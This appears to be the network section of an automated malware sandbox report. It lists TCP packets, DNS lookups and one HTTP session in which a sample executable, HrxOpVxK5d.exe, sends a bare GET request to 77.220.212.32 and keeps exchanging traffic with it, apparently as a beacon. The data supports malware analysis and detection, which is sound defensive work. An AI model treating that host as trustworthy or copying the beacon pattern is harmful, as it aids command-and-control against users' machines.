Nov 9, 2024 02:47:38.902209997 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.902221918 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.902230978 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.902235985 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.907917023 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.907974958 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.908065081 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.909393072 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.909413099 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.911180973 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.911212921 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.911346912 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.911484003 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.911497116 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.913839102 CET	443	49757	104.98.116.138	192.168.2.7
Nov 9, 2024 02:47:38.913909912 CET	49757	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:38.940082073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:38.940145016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.009259939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.014044046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.057919025 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.058212042 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.058229923 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.059326887 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.059397936 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.059890985 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.059957027 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.060143948 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.060152054 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.060184956 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.060233116 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.123836994 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:39.124675989 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:39.124696016 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:39.224447966 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.224565983 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.232314110 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.232319117 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.249027014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.249058008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.249068022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.249102116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.249124050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.261378050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.266195059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.464612007 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.465533018 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.465552092 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.466139078 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.466142893 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.500756025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.500814915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.538002014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:39.542819023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:39.574620008 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.576674938 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.576694965 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.589731932 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.589740038 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.594150066 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.594221115 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.594368935 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.594724894 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.594748020 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.594760895 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.594768047 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.599263906 CET	53096	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.599277973 CET	443	53096	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.599343061 CET	53096	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.599523067 CET	53096	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.599534035 CET	443	53096	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.631179094 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.631731987 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.631742954 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.632380962 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.632385969 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.654372931 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.654887915 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.654910088 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.655817032 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.655822039 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.710700989 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.711019039 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.711034060 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.712196112 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.712261915 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.712601900 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.712672949 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.712795973 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.712805033 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.712824106 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.712838888 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.712882042 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.719857931 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.719913960 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.719959974 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.720005035 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.720237970 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.720247030 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.720282078 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.720290899 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.723625898 CET	53097	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.723670006 CET	443	53097	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.723742008 CET	53097	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.723910093 CET	53097	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.723925114 CET	443	53097	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.752717018 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:39.752731085 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:39.752743006 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:39.752751112 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:39.759773970 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.759838104 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.760082960 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.760175943 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.760176897 CET	53093	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.760193110 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.760202885 CET	443	53093	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.763573885 CET	53098	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.763588905 CET	443	53098	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.763653994 CET	53098	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.764143944 CET	53098	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.764153957 CET	443	53098	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.785137892 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.785218954 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.785533905 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.785725117 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.785732031 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.785743952 CET	53094	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.785748959 CET	443	53094	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.788938999 CET	53099	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.788975000 CET	443	53099	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.789050102 CET	53099	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.789205074 CET	53099	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:39.789218903 CET	443	53099	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:39.884450912 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.885375023 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.886045933 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:39.886096001 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:39.886156082 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:40.017889977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.017951965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.139996052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.140089035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.144840956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.144939899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.144984961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.144994974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145003080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145015001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145039082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.145076036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145080090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.145088911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145144939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.145154953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145167112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145210981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145216942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.145307064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145317078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145328999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145356894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145368099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.145386934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.145411968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.149960995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150154114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150224924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150253057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150337934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:40.150474072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150567055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.150798082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155226946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155453920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155517101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155527115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155544043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155553102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155561924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155570984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155580997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155632973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155642986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155651093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155687094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155697107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155704975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155715942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155770063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155778885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155788898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155803919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155848980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.155904055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.156004906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:40.315475941 CET	443	53090	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.316553116 CET	53090	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:40.316567898 CET	443	53090	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.319488049 CET	53090	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:40.319494009 CET	443	53090	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.328008890 CET	443	53096	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.328428984 CET	53096	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:40.328445911 CET	443	53096	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.328999996 CET	53096	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:40.329005003 CET	443	53096	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:40.395215034 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:40.395237923 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:40.395271063 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:40.395308018 CET	53086	443	192.168.2.7	40.126.32.68

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 9, 2024 02:47:13.625777960 CET	192.168.2.7	1.1.1.1	0xbe18	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:13.626017094 CET	192.168.2.7	1.1.1.1	0xefd7	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:18.574501991 CET	192.168.2.7	1.1.1.1	0xae77	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:18.574670076 CET	192.168.2.7	1.1.1.1	0xd66	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:19.575973988 CET	192.168.2.7	1.1.1.1	0x9b3c	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:19.576116085 CET	192.168.2.7	1.1.1.1	0x1a3b	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:25.917768955 CET	192.168.2.7	1.1.1.1	0x69d9	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:25.918023109 CET	192.168.2.7	1.1.1.1	0x214f	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:27.549642086 CET	192.168.2.7	1.1.1.1	0x4a56	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:27.549767017 CET	192.168.2.7	1.1.1.1	0x7a55	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 9, 2024 02:47:28.688271999 CET	192.168.2.7	1.1.1.1	0x5194	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.688381910 CET	192.168.2.7	1.1.1.1	0xd702	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:28.705981970 CET	192.168.2.7	1.1.1.1	0xe542	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.706206083 CET	192.168.2.7	1.1.1.1	0x6cc9	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:28.710537910 CET	192.168.2.7	1.1.1.1	0xdfc1	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.710757017 CET	192.168.2.7	1.1.1.1	0xdc33	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:28.720037937 CET	192.168.2.7	1.1.1.1	0x93d6	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.720385075 CET	192.168.2.7	1.1.1.1	0x9681	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:30.668307066 CET	192.168.2.7	1.1.1.1	0xec49	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.668562889 CET	192.168.2.7	1.1.1.1	0xb260	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:30.669019938 CET	192.168.2.7	1.1.1.1	0xffc9	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.669188976 CET	192.168.2.7	1.1.1.1	0x7506	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 9, 2024 02:47:30.683237076 CET	192.168.2.7	1.1.1.1	0x522b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.683432102 CET	192.168.2.7	1.1.1.1	0x4a95	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 9, 2024 02:47:13.632596016 CET	1.1.1.1	192.168.2.7	0xbe18	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:13.632709980 CET	1.1.1.1	192.168.2.7	0xefd7	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 9, 2024 02:47:18.581046104 CET	1.1.1.1	192.168.2.7	0xae77	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:18.581046104 CET	1.1.1.1	192.168.2.7	0xae77	No error (0)	plus.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:18.581597090 CET	1.1.1.1	192.168.2.7	0xd66	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:19.582710028 CET	1.1.1.1	192.168.2.7	0x9b3c	No error (0)	play.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:25.924455881 CET	1.1.1.1	192.168.2.7	0x69d9	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:25.924467087 CET	1.1.1.1	192.168.2.7	0x214f	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:25.926786900 CET	1.1.1.1	192.168.2.7	0xd158	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:25.926873922 CET	1.1.1.1	192.168.2.7	0x7fb5	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:25.926873922 CET	1.1.1.1	192.168.2.7	0x7fb5	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:27.556544065 CET	1.1.1.1	192.168.2.7	0x4a56	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:27.556668997 CET	1.1.1.1	192.168.2.7	0x7a55	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.694969893 CET	1.1.1.1	192.168.2.7	0x5194	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.694969893 CET	1.1.1.1	192.168.2.7	0x5194	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.694969893 CET	1.1.1.1	192.168.2.7	0x5194	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.694969893 CET	1.1.1.1	192.168.2.7	0x5194	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:28.712747097 CET	1.1.1.1	192.168.2.7	0xe542	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.713078022 CET	1.1.1.1	192.168.2.7	0x6cc9	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.717570066 CET	1.1.1.1	192.168.2.7	0xdc33	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.717863083 CET	1.1.1.1	192.168.2.7	0xdfc1	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.726757050 CET	1.1.1.1	192.168.2.7	0x93d6	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:28.727283955 CET	1.1.1.1	192.168.2.7	0x9681	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:30.174906969 CET	1.1.1.1	192.168.2.7	0xf599	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 02:47:30.174906969 CET	1.1.1.1	192.168.2.7	0xf599	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.675721884 CET	1.1.1.1	192.168.2.7	0xec49	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.675721884 CET	1.1.1.1	192.168.2.7	0xec49	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.675825119 CET	1.1.1.1	192.168.2.7	0xb260	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 9, 2024 02:47:30.676445961 CET	1.1.1.1	192.168.2.7	0xffc9	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.676445961 CET	1.1.1.1	192.168.2.7	0xffc9	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.676580906 CET	1.1.1.1	192.168.2.7	0x7506	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 9, 2024 02:47:30.689883947 CET	1.1.1.1	192.168.2.7	0x522b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.689883947 CET	1.1.1.1	192.168.2.7	0x522b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 9, 2024 02:47:30.690254927 CET	1.1.1.1	192.168.2.7	0x4a95	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 9, 2024 02:47:31.225826979 CET	1.1.1.1	192.168.2.7	0xfe42	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	77.220.212.32	80	6396	C:\Users\user\Desktop\HrxOpVxK5d.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 02:47:07.701685905 CET	88	OUT	GET / HTTP/1.1 Host: 77.220.212.32 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:08.532464027 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
